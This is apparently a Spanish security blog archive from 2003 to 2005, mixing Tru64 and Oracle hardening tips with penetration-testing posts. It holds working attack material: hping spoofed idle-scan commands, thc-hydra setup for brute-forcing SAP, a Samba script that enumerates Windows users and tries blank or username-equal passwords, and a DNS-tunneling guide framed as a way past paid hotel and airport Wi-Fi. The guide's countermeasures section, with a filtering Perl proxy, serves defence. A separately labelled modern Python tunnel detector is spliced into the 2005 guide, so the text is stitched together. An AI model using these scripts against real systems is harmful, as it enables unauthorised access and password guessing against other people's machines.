seguridad Archives

November 13, 2003

Enhanced Security on Tru64

From: Jon Buchanan <Jonathan.Buchanan@ska.com>

You asked for the pros and cons of Enhanced Security. Well, here's my view:

Pros:

+ a protected password database
+ records last successful and unsuccessful logins
+ records repeated login failures
+ automatic lockout after repeated login failure
+ configurable minimum password length
+ password lifetimes
+ password quality checks
+ password change history
+ password usage history
+ GUI for user account maintenance
+ templates for user setup
+ audit subsystem (means C2 security requirements can be satisfied)

Cons:

- performance problems with very large user base (>1000 users)
- NIS doesn't work with other operating systems
- still not as secure as Sun's NIS+
- no (official) failover for NIS master -> single point of failure
- new and not very well understood, even by Digital!

To answer your questions:

1) Turn enhanced security on/off with the secsetup utility. However, if
turning it off, you may find that you need to give all users a new password.

2) Follow the procedures in the 'Security' manual to migrate users from base
to enhanced security. They provide scripts which do it for you.

I think you should decide first whether you want Enhanced Security or not,
and then deal with the admin problems that arise. However, don't base your
decision on the admin problems, base it on your need for security.

Attached is a general list of tips and notes regarding Enhanced Security.
It provides detail on some of the issues just mentioned.

Regards,
Jon Buchanan, Zuerich, Switzerland
[ Jonathan.Buchanan@ska.com ]

Some tips and notes about Enhanced Security:

With enhanced security, your user, group and password databases are
divided into many places:

/etc/passwd
This contains entries for local users not defined under NIS.
Passwords are not stored here - a * appears in place of each password.
Typically you would leave the system users like root, daemon etc here.
NIS-defined users must not appear in this file!
At the end of this file is +: for NIS to be searched.

/tcb/files/auth directories
Users defined in /etc/passwd have security profiles in these
directories. Their passwords, and things like successful/unsuccessful
login info are stored here. No NIS users have profiles in these
directories.

/etc/group
This contains entries for local groups not defined under NIS.
At the end of this file is +:

/var/yp/src/passwd
This is your NIS passwd file.
Local users, defined in /etc/passwd, should NOT appear here!
Passwords are not stored here - a * appears in place of each password.
The file should not contain +:

/var/yp/src/prpasswd
This is the 'protected password' NIS file, which functions like the
/tcb directory but for NIS users instead of local users. All users
with an entry in the NIS password file have an entry here.

/var/yp/src/group
This is the NIS group file.
Local groups, defined in /etc/group, should NOT appear here!
The file should not contain +:

Creating the prpasswd file is described in the section 'Moving Local
Accounts to NIS' in the 'Security' manual. You have to copy the script
they give you in the book, which reads all the information from the /tcb
tree and writes it into a file with one line per user. After that you
need to:

- delete (or move) all security profiles below /tcb for NIS registered
users
- delete all prpasswd entries for locally registered users (like root)

this is in accordance with the split described above.

When you are using the advanced security XIsso and XSysAdmin tools you
choose whether to manage the local or NIS registered users by clicking
on the 'Network Control' button. It then updates only the appropriate
files, and in the case of the NIS files, does a make for you.

To change passwords, use passwd for all accounts including the NIS ones.

/etc/svc.conf should contain an entry like: auth=local,yp

Delete the files /etc/passwd.dir and passwd.pag if you have them. These
are 'hashed' password files which adduser offers to make for you when it
finds they are not there. However, you don't need them and it will
probably stop NIS from working properly.

The main problem with switching Enhanced Security/NIS on and off is in
restoring the information to the correct place. Above all, Enhanced
Security passwords CANNOT be re-inserted into the passwd files (in place
of the *'s) - you need to give all users a new password.

A couple of problems that took us a long time to solve:

- The file /etc/auth/system/files must contain entries for
prpasswd and prpasswd:t. We have added them like this:

/var/yp/src/prpasswd:\
:f_type=r:f_mode#0660:f_owner=auth:f_group=auth:\
:chkent:
/var/yp/src/prpasswd\:t:\
:f_type=r:f_mode#0660:f_owner=auth:f_group=auth:\
:chkent:

- An Enhanced Security NIS Slave cannot operate independently of the
Enhanced Security NIS Master. This is because the prpasswd file
is updated with every login attempt, and is only mastered on the
NIS Master. In other words, there's no point having a Slave because
it won't be able to function without the Master running.

DEC have refused to acknowledge this as a problem, so a fix is
unlikely for the foreseeable future. We have worked around it by
setting up a second Master and copying certain files from the
'real' master to the 'second' master periodically using rdist.
It is not an altogether satisfactory solution but it works and we
prefer it to being dependent on the availability of one machine.
Let me know if you would like more details on setting this up.

If you are determined to set up a Slave then you may hit another problem
too, whereby a make of the yp maps pauses for a few minutes. Fix is to
send the Slave the copies of the maps which it is missing by using ypxfr
(but a better fix is to disable the Slave).

One other note about Enhanced Security - if your system manages X
sessions for X displays (such as PCs) then you will need to add entries
for these remote displays to the files /etc/auth/system/devassign and
/etc/auth/system/ttys. I can let you have more details if you need
them.

From: Spider Boardman <spider@Orb.Nashua.NH.US>

I'm afraid your question didn't make a lot of sense to me, unless
I assume that you don't have Enhanced Security in use, but that
you merely have its subsets installed (which is not enough to
enable it).

In particular, check the output of running this command:
/usr/sbin/rcmgr get SECURITY BASE
If it's BASE then you've not enabled Enhanced Security.

The /usr/sbin/secsetup script is supposed to take care of
creating prpasswd entries (the /tcb/files/auth/?/* files) for the
users which were already in /etc/passwd when you enable the "C2"
login features. If it didn't, then that's a bug. I do seem to
recall that the adduser script had a bad habit of creating
prpasswd entries even when it shouldn't, because it didn't check
the result of the rcmgr command above. Unless that returns
ENHANCED you're still using "BASE" security.

January 4, 2004

Compiling thc-hydra with SAP support (without the SAP CD)

Which we will use for brute-forcing SAP R/3.

You need to have SAP's RFCSDK libraries:

Something about this is explained in the SAP-RFC Perl module:

http://www.cpan.org/modules/by-module/Apache/SAP-Rfc-1.31.readme

Thanks to Achim Grolms who supplied the following information :-

- where to get the required SAP files for the RFCSDK:

Archive program needed to extract the archives

Dynamic libraries and headers

-This is how to extract
(Like ./SAPCAR -xvf librfc_mt_so_dbg.CAR)

-and where to put them
(libs to $RFCSDKHOME/lib and headers to $RFCSDKHOME/include)

where RFCSDK should be /usr/sap/rfcsdk as a standard

----

Although I had to download RFC_OPT_46C.SAR from the same ftp and unpack it
with SAPCAR as well. Change $RFCSDKHOME to /usr, because otherwise hydra's
configure does not pick it up.

The same SAR includes useful utilities, such as sapinfo

January 28, 2004

How to Determine if Enhanced Security Is Installed and Running

If you are not sure if the optional, enhanced-security features are
installed on your system, you can check as follows:

$ ls -l /usr/.smdb./OSFC2SEC4??.lk
-rw-r--r-- 1 root system 0 Nov 8 11:02 \
/usr/.smdb./OSFC2SEC400.lk

The presence of the lock file (OSFC2SEC400.lk) indicates that the enhanced
security subset is installed (but not necessarily running) on your system. If
the subset is not installed, you will receive a "not found" message.

To determine if the installed enhanced security is running on your system,
enter the following command:

$ /usr/sbin/rcmgr get SECURITY BASE
ENHANCED


If the string "ENHANCED" is returned, enhanced security is running. If the
string "BASE" is returned, enhanced security is not running.

From:
http://www.cs.arizona.edu/computer.help/policy/DIGITAL_unix/AA-Q0R2D-TET1_html/sec.c23.html

May 31, 2004

Oracle hardening (SQL scripts)

Check for default Oracle users (SQL script)

Source:
http://www.pentest.co.uk/sql/check_users.sql

Mirror: http://www.pentest.co.uk/sql/check_users.sql

Check of various security aspects:

Source: http://www.pentest.co.uk/sql/scanner.sql
Mirror: http://www.pentest.co.uk/sql/scanner.sql

June 21, 2004

Quick-and-dirty statistics for ClamAV

awk '/INFECTED/ { print $8}' /var/log/maillog.1 | \
sed -e 's,(\(.*\))\,,\1,' | sort | uniq -c | sort -nr

Another option:
-------------------------------------------------------------------

valerts=/var/mail/virtual/unsec.net/virusalert
var1=`grep "Subject: VIRUS" $valerts | sed -e 's,.*(\(.*\)).*,\1,g' \
| sort | uniq -c| sort -nr`
var2=`grep -A1 'The message WAS NOT delivered to' $valerts | \
grep -e '^<.*:$' | sed -e 's,<\(.*\)>:,\1,' \
| sort | uniq -c | sort -nr`
var3=`echo "$var1" | awk '{ print $1 }' | tr '\n' '+' | sed -e s,.$,,`
var4=$(( $var3 ))
echo " "
echo ".:[ Estadisticas generales ]:."
echo "------------------------------"
echo "Numero total de mails infectados: $var4"
echo " "
echo ".:[ Virus encontrados ]:."
echo "-------------------------"
echo "$var1"
echo " "
echo ".:[ Recipientes con mas virus ]:."
echo "---------------------------------"
echo "$var2"

July 15, 2004

Restore the security policies to the defaults:

secedit /configure /cfg %windir%\repair\secsetup.inf /db secsetup.sdb /verbose

August 6, 2004

Scanning with hping, spoofing via a zombie host

Post by antirez

The Players:

host A - evil host, the attacker.
host B - silent host.
host C - victim host.

- Check that host B is "idle" by seeing that its IP "id" only increases
because of our own packets (+1)
#hping B -r
HPING B (eth0 xxx.yyy.zzz.jjj): no flags are set, 40 data bytes
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=1 ttl=64 id=+1 win=0 time=75 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=2 ttl=64 id=+1 win=0 time=91 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=3 ttl=64 id=+1 win=0 time=90 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=4 ttl=64 id=+1 win=0 time=91 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=5 ttl=64 id=+1 win=0 time=87 ms

- Send packets to C spoofed as B while checking the ids in another window
#hping C -a B -S

--------------------------
nmap supports this with -sI

August 12, 2004

Web brute force for Linux (among other things)

Although the really interesting part is that it offers web brute-forcing, it
also does other things such as CGI scanning and banner grabbing.
babelweb
I'm keeping a local copy because I surely won't find it again later:
babelweb

August 23, 2004

PingScan

The best way to do a ping scan (definitely) is with nmap, not icmpenum, not
sing, none of that...

nmap -sP -PM -PE -PP -PS21,22,25,53,80,110,135,143,139

Although I don't understand why they haven't added "Information Request"
(type 15) as one of nmap's -Px options.

Besides the limited number of ports in the -PS (TCP SYN) parameter.

Updated: Fri Aug 15 01:55:55 CEST 2008 (from fyodor's DC talk)

nmap -sP -PE -PP -PS21,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4

Four years later, the man page explains the reason for leaving Information
Request out }:>

May 16, 2005

Getting the list of users from a Windows box via Samba

The 'rpcclient' tool from Samba 3 is used; the one in the samba-tng fork of
Samba is much more complete, but to save installing it...

A simple way to do it is:

---- cut here ----
# set IP, WORKGROUP and HOST to the system being queried before running
for rid in `rpcclient -I $IP -W $WORKGROUP $HOST \
-c "enumdomusers" | sed -e 's,.*\[\(.*\)\],\1,'`;
do
rpcclient -I $IP -W $WORKGROUP $HOST \
-c "queryuser $rid" | awk '/User Name/ {print $4}'
done
---- cut here ----
Note: bear in mind that if we do not have anonymous access to IPC$ we will
have to authenticate using -U in the rpcclient command.

To simulate on Linux what Cerberus's nbtdump.exe does (see users with no
password or with user=pass), in a crude way, the following could be used:

----- cut here ----
IP=$1
USER=$2
PASS=$3

NMBLOOKUP=`nmblookup -A $IP 2>/dev/null`
if [ `echo -e "$NMBLOOKUP"|wc -l` -lt 5 ]; then
echo "Netbios not found"
exit 1
fi

# NetBIOS name (<20>) and workgroup (<1e>) from the name table
SISTEMA=`echo "$NMBLOOKUP"| awk '/<20>/ { print $1 }'`
WORKGROUP=`echo "$NMBLOOKUP"| awk '/<1e>/ { print $1 }'`

for rid in `rpcclient -I $IP -W $WORKGROUP $SISTEMA \
-U$USER%$PASS -c "enumdomusers" | \
sed -e 's,.*\[\(.*\)\],\1,'`;
do
u="$u\n"`rpcclient -I $IP -W $WORKGROUP $SISTEMA -U$USER%$PASS \
-c "queryuser $rid" | awk '/User Name/ {print $4}'`
done
if [ $(echo -e "$u" | grep -E "[[:alpha:]]" | wc -l) -gt 0 ]; then
echo -e "Lista de usuarios:\n------------------$u"
else
echo -e "Lista de usuarios:\n------------------\nSin acceso"
fi

for user in `echo -e "$u"`; do
# password equal to the user name
n=`smbclient -L //$SISTEMA -I $IP -W $SISTEMA -U$user%$user 2>&1`
if [ `echo -e "$n"|grep -E "ACCESS_DENIED|NT_STATUS_LOGON_FAILURE" | \
wc -l` -eq 0 ]; then
r="$r\n$user/$user"
fi
# blank password (-N: do not prompt for one)
n=`smbclient -L //$SISTEMA -I $IP -W $SISTEMA -N -U$user 2>&1`
if [ `echo -e "$n"|grep -E "ACCESS_DENIED|NT_STATUS_LOGON_FAILURE" | \
wc -l` -eq 0 ]; then
r="$r\n$user contraseña en blanco"
fi

done

if [ $(echo -e "$r" | grep -E "[[:alpha:]]" | wc -l) -gt 0 ]; then
echo -e "Accesos:\n---------$r"
fi
----- cut here ----

TODO: look into modifying rpcclient to do this

Quick guide to IP tunneling over DNS

+---------------------------------------------------------------+
| Quick guide to IP tunneling over DNS          Alejandro Ramos |
| 29/Mar/2005 v0.2                            aramosf@unsec.net |
+---------------------------------------------------------------+


/ 1.- Introduction /
+--------------------+

The purpose of this guide is to create an IP tunnel over the DNS protocol
in order to get out to the Internet in an environment where the only service
we can reach is a DNS server that resolves Internet addresses.

Very handy for wireless networks that let you associate but only give you a
way out once you have authenticated via HTTP, after paying. For example, in
airports and hotels. These places usually have a DNS server that resolves
Internet domains, an indispensable requirement.

The following text will show a practical example of one of these
configurations.

The way it works is simple: a DNS server is developed that answers certain
requests, encapsulating the data in Base32 (if the requests are made via
CNAME) or in Base64 (if they are TXT records). The client is able to decode
the encapsulated request and generate the correct packet.


At present there are two applications that let us build a tunnel through
DNS: nstx (http://nstx.dereference.de/nstx/) and ozymandns
(http://www.doxpara.com/). A comparison list follows:

Advantages of ozymandns:
* It is written in Perl, so it can be ported to any system that supports
this interpreter.
* It is simple and quick to configure.
Drawbacks of ozymandns:
* It only allows SSH, or a further SSH tunnel has to be set up afterwards.
* The software is beta and unstable.

Advantages of nstx:
* It allows any kind of service to be used.
* Older and more thoroughly tested software.
* Packages exist for some distributions (debian sid).
Drawbacks of nstx:
* Both server and client have to be Linux.
* A tun/tap tunnel needs to be created.


Besides these applications there are others that let us send and receive
files over DNS, or use it to encapsulate VoIP.

OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO
J                                                                     J
O   Neither system uses authentication: anyone who knows the          O
J   configuration made on your system could use the DNS tunnel.       J
O                                                                     O
OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO


/ 2.- Requirements /
+--------------------+

We start from the premise that we have a basic understanding of how a DNS
server works and what its record types are: A, NS, TXT...

A typical configuration, in which our own devices are marked between
asterisks, could be the following:


[*client PC*] ~~ wireless ~~ [ AP ]
                               |
                           [ switch ]-----[ DNS server (with access) ]
                               |
                           [ router ]
                               |
                            /\/\/\/\/\
      [*DNS server*]-------|Internet|-----[*tunnel server*]
                            \/\/\/\/\/

So the following would be needed:
- A client from which to set up the tunnel.
- A DNS server that we can administer and on which we have a domain.
- A tunnel server, where the server application will run.
- Access, as a client, to a DNS server.


The example used throughout the text will use the following data:
- DNS server (with access): 10.1.2.2; this will be the DNS server we have
access to as a client, and it must be able to resolve our domain.
- Tunnel server: this system is ours and on it we will install the part that
serves requests; a DNS server has to be able to query it, and for that it
needs 53/udp open to the Internet.
- DNS server: its IP does not matter.


/ 3.- DNS configuration /
+-------------------------+

If the concept of recursion in DNS and how it works is clear, there should be
no difficulty configuring the domain in order to set up the tunnel.

The example will use the domain 'digitalsec.net' as a reference.

Edit the zone file for digitalsec.net, in this case (Fedora Core 3 with a
chrooted named): /var/named/chroot/var/named/db.digitalsec.net, and add the
following records:

t.digitalsec.net. IN NS tun.digitalsec.net.
tun IN A 65.73.147.191

With these two records, every request under t.digitalsec.net is sent to the
system tun.digitalsec.net (65.73.147.191). That is, if someone asks for
'foo.t.digitalsec.net', the DNS server listening for t.digitalsec.net
(65.73.147.191) will be the one in charge of resolving those requests.

65.73.147.191 is where the DNS tunnel server has to be.

This configuration is common to nstx and ozymandns. The tests were carried
out with bind and everything worked correctly; from what I have seen in the
debian package, djbdns needs patching in the case of nstx. So if you want no
additional complications, the simplest thing is to use bind.

/ 4.- ozymandns configuration /
+--------------------------------+

Get the software from its official URL: http://www.doxpara.com/; at present
the latest version is: http://www.doxpara.com/ozymandns_src_0.1.tgz.
For ozymandns to work a number of CPAN modules are needed; detailed
information on how to install them can be found at:
http://www.cpan.org/modules/INSTALL.html. Many distributions ship some of
these modules as packages, so it would not be necessary to install and
compile them by hand.

The scripts needed to make the tunnel work are: nomde.pl (server) and
droute.pl (client); the other applications included in the tarball are for
other purposes.

Once everything needed has been installed, running the Perl scripts should
give no problem and should show the help:

# perl nomde.pl
nomde 0.1: Experimental DNS Server
Component of: OzymanDNS Dan Kaminsky(dan@doxpara.com)
Usage: nomde -l 10.0.1.11 servername.foo.com
Options: -i [ip address]: IP address to host for all A requests
-f [filename] : Filename to host in TXT records [b64]
-p [name] : Name/IP to return for reverse lookups[ptr]
-L [name:host:port]: Forward function to address, port
(Default: sshdns:127.0.0.1:22)


Bear in mind that this application is a beta and has some bugs: the help does
not match the real options and, in the specific case of "nomde.pl", the -L
parameter does not work as expected. This point will be covered later on,
when the server is configured.

- SERVER SIDE - :

This is the service that will run on the tunnel server, specifically at the
address tun.digitalsec.net (65.73.147.191).

The following command would leave this part ready:

# ./nomde.pl -i 127.0.0.1 t.digitalsec.net
creating TCP socket...done.
creating UDP socket...done.
waiting for connections...

By default this allows an SSH to 127.0.0.1 (that is, to the server running
the tunnel, tun.digitalsec.net) on port 22. In theory this can be changed
with the "-L" option, but because of a bug it does not work, and if you want
the SSH to go to another IP and port you will have to change it in the source
code:

Changing line 32 of nomde.pl:
"Localforward"=> \$opts{forward}
to the following:
"Localforward=s"=> \$opts{forward}

solves the problem.

This command will let us SSH to port 2222 of 82.165.25.126

# ./nomde.pl -i 127.0.0.1 -L sshdns:82.165.25.126:2222 t.digitalsec.net
creating TCP socket...done.
creating UDP socket...done.
waiting for connections...

Because of another bug the script "dies" from time to time; to have it
restarted every time it fails, a temporary workaround such as the following
can be used:

# while true; do ./nomde.pl -i 127.0.0.1 t.digitalsec.net; done


- CLIENT SIDE - :

Follow the same steps as on the server to install the CPAN modules needed so
that running the "droute.pl" script gives no problem.

# ssh -p2222 -o ProxyCommand="droute.pl sshdns.t.digitalsec.net" \
aramosf@82.165.25.126

This will SSH to the system that was specified earlier on the server with
the -L option. Note that "sshdns" has been prepended to t.digitalsec.net.
Another observation is that the user and IP address will only be used when
checking whether a private key exists or whether the remote system is a
"known host". If you want to change the destination address of the SSH, it
has to be done on the tunnel server (nomde.pl) with the -L option.


If you want to run the droute.pl script on Windows, it can be done with
cygwin's perl and ssh, using the CPAN modules. Although it might also work
under ActiveState's perl and with another SSH client that supports an option
like the openssh client's "ProxyCommand".

/ 5.- nstx configuration /
+---------------------------+

For nstx to work, the kernel of the Linux systems must be compiled with
ethertap/tun support. Both client and server.

Device Drivers --->
  Networking support --->
    Universal TUN/TAP device driver support


Sometimes the device has to be created by hand:

# mkdir /dev/net
# mknod /dev/net/tun c 10 200


NOTE: The configuration of tun0, on both server and client, is done AFTER
starting the applications.


- SERVER SIDE - :

It will be installed, as in the ozymandns case, on tun.digitalsec.net
(65.73.147.191). Download the software from: http://nstx.dereference.de/nstx/.
The latest version at present is: nstx-1.1-beta6.tgz

As explained earlier, a package with the needed binaries may exist. In the
case of debian sid the package is called "nstx", and installing it with the
command "apt-get install nstx" would be enough; you would only have to
configure it in the file /etc/default/nstx.

Once unpacked and compiled:

# tar -zxvf nstx-1.1-beta6.tgz
# cd nstx-1.1-beta6
# make

You will have the binaries needed to run the server side, which is started
with the option that changes its UID to the user nobody and leaves the
service in the background:

# ./nstxd -u nobody -D t.digitalsec.net
Opening tun/tap-device... using device tun0
Please configure this device appropriately (IP, routes, etc.)
Opening nameserver-socket... listening on 53/UDP

Load the TUN module:

# modprobe -a tun

Finally, configure the interface with an internal IP (whichever you like):

# ifconfig tun0 172.26.0.2 netmask 255.255.255.0


- CLIENT SIDE - :

Carry out the same download and compile process of the nstx tarball for the
client side.

Load the TUN module:

# modprobe -a tun

Launch the client pointing at t.digitalsec.net and at the DNS server we have
access to as a client, 10.1.2.2 in the example:

# ./nstxcd t.digitalsec.net 10.1.2.2

Finally, configure the tun0 device with an interface in the same network as
the server:

# ifconfig tun0 172.26.0.1 netmask 255.255.255.0

With this there should now be connectivity between our client and the remote
server's IP: 172.26.0.2


/ 6.- Countermeasures /
+-----------------------+
One possible option to block CNAME requests is using iptables on the
router/firewall with a rule similar to this one:

# iptables -t filter -A INPUT -p udp --dport 53 \
-m string --string "CNAME" -j DROP

To use "string" in iptables the corresponding "patch-o-matic" patch has to be
applied. The problem with this method is the drop in system performance and
the large number of discarded packets that are false positives; furthermore,
applying the same filter to TXT would leave a network with far too many
dropped packets.

An alternative is to use a DNS server that does not accept TXT or CNAME
queries, or that checks the size of the responses in order to spot possible
packed requests.

The following example shows a fairly simple Perl script that performs this
function.

--------------------------------------------------------------------------------

#!/usr/bin/perl
# Mon May 16 00:00:44 CEST 2005
# Last version at: http://www.unsec.net
#
# proxy-dns, check length of responses and deny TXT records
#
# BUGS: All Net::DNS bugs -> SLOW!
#

use Net::DNS::Nameserver;
use Net::DNS::Resolver;
use Net::DNS;
use Getopt::Long;
use POSIX qw(strftime);
use strict;

my ($daemon, $verbose, $ns, $help);

my $length = 100;          # longest reply (in characters) that is forwarded
my $log = "/dev/stdout";
GetOptions(
    "daemon"   => \$daemon,
    "log=s"    => \$log,
    "ns=s"     => \$ns,
    "length=i" => \$length,
    "verbose"  => \$verbose,
    "help"     => \$help);

if (defined($help)) {
    print STDERR <<"EOD";
Syntax: $0 [--daemon] [--log <file>] [--verbose] [--ns <server>] [--length <n>] [--help]
Options:
  --daemon      : run script as daemon
  --log <file>  : log all queries to <file> (default: STDOUT)
  --ns <server> : use <server> instead of /etc/resolv.conf
  --length <n>  : maximum length of a reply (default: 100)
  --verbose     : verbose output
  --help        : this help
EOD
    exit 1;
}

if (defined($daemon)) {
    defined(my $pid = fork) or die "Error: $!";
    exit if $pid;
}

open LOG, ">>$log" or die "Cannot open $log: $!";
print LOG scalar(localtime) . " [$0] Starting service\n";

sub reply_handler {
    my ($qname, $qclass, $qtype, $peerhost) = @_;
    my ($rcode, @ans, @auth, @add, $ret);
    $rcode = "NOERROR";
    # resolve the query upstream, then decide whether to pass the answer on
    my $res = Net::DNS::Resolver->new;
    $res->nameservers($ns) if defined $ns;
    my $query = $res->query($qname, $qtype);
    if ($query) {
        foreach my $rr ($query->answer) {
            next unless $rr->type eq $qtype;
            $ret = $rr->address  if $qtype eq "A";
            $ret = $rr->ptrdname if $qtype eq "PTR";
            $ret = $rr->nsdname  if $qtype eq "NS";
            $ret = $rr->cname    if $qtype eq "CNAME";
            $ret = join(" ", $rr->txtdata) if $qtype eq "TXT";
            if ($qtype eq "MX") {
                $ret = $rr->preference . " " . $rr->exchange;
            }

            # forward only non-TXT answers that are short enough; anything
            # else is refused, since long replies may carry tunnelled data
            if ($qtype ne "TXT" && length($ret) <= $length) {
                my ($ttl, $rdata) = (3600, "$ret");
                push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype $rdata");
                print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
                    "from: $peerhost reply: $rdata\n";
                $rcode = "NOERROR";
            } else {
                print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
                    "from: $peerhost reply: REFUSED(" . length($ret) . ")\n";
                $rcode = "REFUSED";
            }
        }
    } else {
        print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
            "from: $peerhost reply: NO ANSWER\n";
        $rcode = "NOTAUTH";
    }
    return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

# $server is the listening side; $ns (above) is the upstream resolver
my $server = Net::DNS::Nameserver->new(
    LocalPort    => 53,
    ReplyHandler => \&reply_handler,
    Verbose      => $verbose,
) || die "couldn't create nameserver\n";

$server->main_loop;

close LOG;
--------------------------------------------------------------------------------
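As an added example (not part of the original guide) of the detection side the countermeasures section describes, here is a Python scorer that flags tunnel-like queries in a constructed query log: over-long labels, TXT/CNAME types, payloads drawn only from the Base32 or hex alphabet, high entropy, and many distinct names under one delegated zone. The log format, the client address 10.1.2.50 and all thresholds are assumptions made for this example.

```python
"""Score DNS queries for tunnel-like traits (added example, constructed data)."""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed sample log, one query per line: "client qtype qname".
# The t.digitalsec.net names mimic the encoded labels a tunnel client
# emits (base32-style and hex-style payloads); the rest are ordinary lookups.
SAMPLE_LOG = """\
10.1.2.50 A www.example.com
10.1.2.50 TXT mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi.t.digitalsec.net
10.1.2.50 A mail.example.com
10.1.2.50 CNAME 0a1b2c3d4e5f60718293a4b5c6d7e8f9.t.digitalsec.net
10.1.2.50 TXT _dmarc.example.com
10.1.2.50 A cdn-assets-0042.static.example.com
10.1.2.50 TXT nbswy3dpfqqfo33smqqhe33tmuqfi33i.t.digitalsec.net
"""

BASE32_ALPHABET = set("abcdefghijklmnopqrstuvwxyz234567")
HEX_ALPHABET = set("0123456789abcdef")
DATA_TYPES = {"TXT", "CNAME", "NULL"}   # answers that carry free-form data


@dataclass
class Verdict:
    qname: str
    qtype: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, reason):
        self.score += points
        self.reasons.append(reason)


def shannon_entropy(s):
    """Bits per character of s; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def score_query(qtype, qname, zone_labels=3, max_label=30, max_name=80):
    """Score one query; the higher the score, the more tunnel-like it looks.

    zone_labels is how many trailing labels make up the delegated zone
    (3 for t.digitalsec.net); everything in front of them is the payload.
    Thresholds are assumptions chosen for this example, not measured values.
    """
    labels = qname.rstrip(".").split(".")
    payload = "".join(labels[:-zone_labels]).lower()
    v = Verdict(qname, qtype.upper())
    longest = max(len(label) for label in labels)
    if longest > max_label:
        v.add(2, "label of %d chars exceeds %d" % (longest, max_label))
    if len(qname) > max_name:
        v.add(1, "name of %d chars exceeds %d" % (len(qname), max_name))
    if v.qtype in DATA_TYPES:
        v.add(1, "%s answers can carry arbitrary data" % v.qtype)
    if len(payload) >= 16:
        chars = set(payload)
        if chars <= BASE32_ALPHABET and chars & set("234567"):
            v.add(1, "payload uses only the base32 alphabet")
        elif chars <= HEX_ALPHABET:
            v.add(1, "payload uses only hex digits")
        if shannon_entropy(payload) > 3.5:
            v.add(1, "payload entropy above 3.5 bits/char")
    return v


def parse_log(text):
    """Yield (client, qtype, qname) tuples from the constructed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1], parts[2]


def scan_log(text, threshold=3):
    """Return the verdicts of every query scoring at or above threshold."""
    flagged = []
    for _client, qtype, qname in parse_log(text):
        verdict = score_query(qtype, qname)
        if verdict.score >= threshold:
            flagged.append(verdict)
    return flagged


def suspicious_zones(text, zone_labels=3, min_unique=3):
    """Zones with at least min_unique distinct names queried beneath them.

    A tunnel has to emit a fresh name per packet to get past resolver
    caches, so distinct names pile up under one zone much faster than
    they do for an ordinary domain.
    """
    seen = defaultdict(set)
    for _client, _qtype, qname in parse_log(text):
        labels = qname.rstrip(".").split(".")
        seen[".".join(labels[-zone_labels:])].add(qname)
    return sorted(z for z, names in seen.items() if len(names) >= min_unique)


if __name__ == "__main__":
    for v in scan_log(SAMPLE_LOG):
        print(v.score, v.qtype, v.qname, "|", "; ".join(v.reasons))
    print("zones with many distinct names:", suspicious_zones(SAMPLE_LOG))
```

On real resolver logs the per-query score is noisy on its own; the distinct-names-per-zone count is the signal that separates a tunnel from a busy CDN.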


/ 7.- References /
+------------------+

http://www.doxpara.com/Black_Ops_DNS_BH.ppt
http://www.aripollak.com/wiki/Main/SSHOverDNS
http://slashdot.org/articles/00/09/10/2230242.shtml

/ 8.- Change log /
+------------------+

Mon May 16 00:53:54 CEST 2005
+ Added countermeasures section.
+ English version.
+ Added change log.

May 21, 2005

SNMP Pen-test

Tools for auditing SNMP

ADMsnmp
onesixtyone
pysnmp
snmp-python
snmpbrute-fixedup
SNscan-Foundstone
NetScanTools Pro

From a pen-test thread

August 5, 2005

Lotus Domino security

http://www.cqure.net/tools.jsp?id=11
Lodowep is a tool for analyzing password strength of accounts on a Lotus Domino webserver system. The tool supports both session- and basic-authentication. It runs 20 simultaneous connections guessing passwords specified in a dictionary file against the supplied user file. The tool is written in Java and is released under the GPL version 2.

http://usuarios.lycos.es/reinob/
Lepton's Crack is a generic password cracker, easily customizable with a simple plug-in system. It can perform a dictionary-based (wordlist) attack, as well as a brute-force (incremental) password scan, including enumeration of a regular expression (useful if you know something about the password). Currently the formats supported are: standard MD4 hash, standard MD5 hash, NT MD4/Unicode, Lotus Domino HTTP password (R4) and SHA-1. LM (LAN Manager) support added by Piero Brunati, see below.

http://www.nestonline.com/lcrack/
Port of LCrack with support for other cipher formats.

http://packetstormsecurity.org/Crackers/dhb.zip
Lotus Domino HTTP password

http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip
Domino Hunter 0.92 is a Lotus Domino web server scanner, written in Perl. It attempts to access default NSF databases, as well as crawl user-defined bases. It tries to enumerate the database structure, enumerate available views, available documents, and ACLs set on documents. It also tries to retrieve documents from available views in order to check if ACLs are correctly set to restrict documents and not views. The scanner works in both anonymous mode or privileged mode if user supplied credentials are supplied to then be passed to the default names.nsf/?Login form.

http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz
Domino.pl is a Perl script which checks for remote vulnerabilities in Lotus Domino servers.


DOCUMENTATION:
What is available is rather poor:

Security HandBook (IBM RedBook)

Lotus Notes and Domino R5.0 Security Infrastructure Revealed

ISS domino

November 28, 2005

"Proxy"-type applications for auditing web applications.

Freeware:

Paros proxy (java)
WebScarab (java)
Achilles
Spike
RatProxy
ProxyStrike
ProxMon
Pantera

Windows:

Fiddler
TamperIE (IE plugin)
Odysseus

Commercial:

Webproxy (discontinued)
Burp Tools
HttpWatch (windows, IE plugin)
Suru
Charles

Diciembre 14, 2005

Nokia 7610, 3650 Denial of Service in OBEX.

Severity: Low
Affected: tested in nokia 7610 and nokia 3650 (maybe others symbian
phones).
